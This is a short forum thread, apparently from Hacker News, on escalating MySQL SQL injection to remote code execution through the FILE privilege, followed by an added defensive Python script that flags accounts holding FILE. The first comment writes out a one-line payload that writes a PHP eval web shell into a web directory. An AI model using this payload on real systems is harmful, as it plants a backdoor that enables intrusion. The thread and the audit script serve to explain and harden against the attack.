by mappu 4263 days ago
SQL injection alone is often enough to get you RCE if your MySQL account has FILE permissions enabled (often true). Something like `SELECT "<?php eval($_GET['x'])" INTO OUTFILE /srv/www/backdoor.php`.
2 comments

>(often true)

I don't think it's that often. By default, a new MySQL user will not have FILE privileges granted.

Most of the time you see this due to the developer being lazy and just using the "root" MySQL user.

This would also depend on hilariously bad permissions on /srv/www that allow the mysql user to create files there.
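
As an added example (not written by anyone in this thread): a Python check over `SHOW GRANTS` output that flags accounts able to use the FILE privilege discussed above, whether granted explicitly or through ALL PRIVILEGES on `*.*`. The grant lines are constructed sample input and the function names are hypothetical.

```python
import re

# Matches one line of SHOW GRANTS output, e.g.
#   GRANT SELECT, FILE ON *.* TO `app`@`localhost`
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<account>\S+)",
    re.IGNORECASE,
)

def _split_privs(privs):
    # Drop column lists such as "SELECT (id, name)" before splitting on commas.
    cleaned = re.sub(r"\([^)]*\)", "", privs)
    return {p.strip().upper() for p in cleaned.split(",") if p.strip()}

def accounts_with_file(grant_lines):
    """Return {account: reason} for accounts that hold FILE."""
    findings = {}
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m:
            continue
        # FILE is a global privilege, so only grants on *.* can carry it.
        if m.group("scope") != "*.*":
            continue
        privs = _split_privs(m.group("privs"))
        account = m.group("account").replace("`", "'")
        if "FILE" in privs:
            findings[account] = "explicit FILE"
        elif privs & {"ALL", "ALL PRIVILEGES"}:
            findings[account] = "ALL PRIVILEGES on *.* includes FILE"
    return findings

# Constructed sample input (not taken from any real server).
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO `webapp`@`localhost`",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `shop`.* TO `webapp`@`localhost`",
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT SELECT, FILE ON *.* TO 'report'@'10.0.0.%'",
    "GRANT ALL PRIVILEGES ON `blog`.* TO 'blog'@'localhost'",
]

if __name__ == "__main__":
    for account, reason in accounts_with_file(SAMPLE_GRANTS).items():
        print(f"{account}: {reason}")
```

An application account that shows up here should have FILE revoked; MySQL's `secure_file_priv` setting additionally restricts which directory FILE operations may touch.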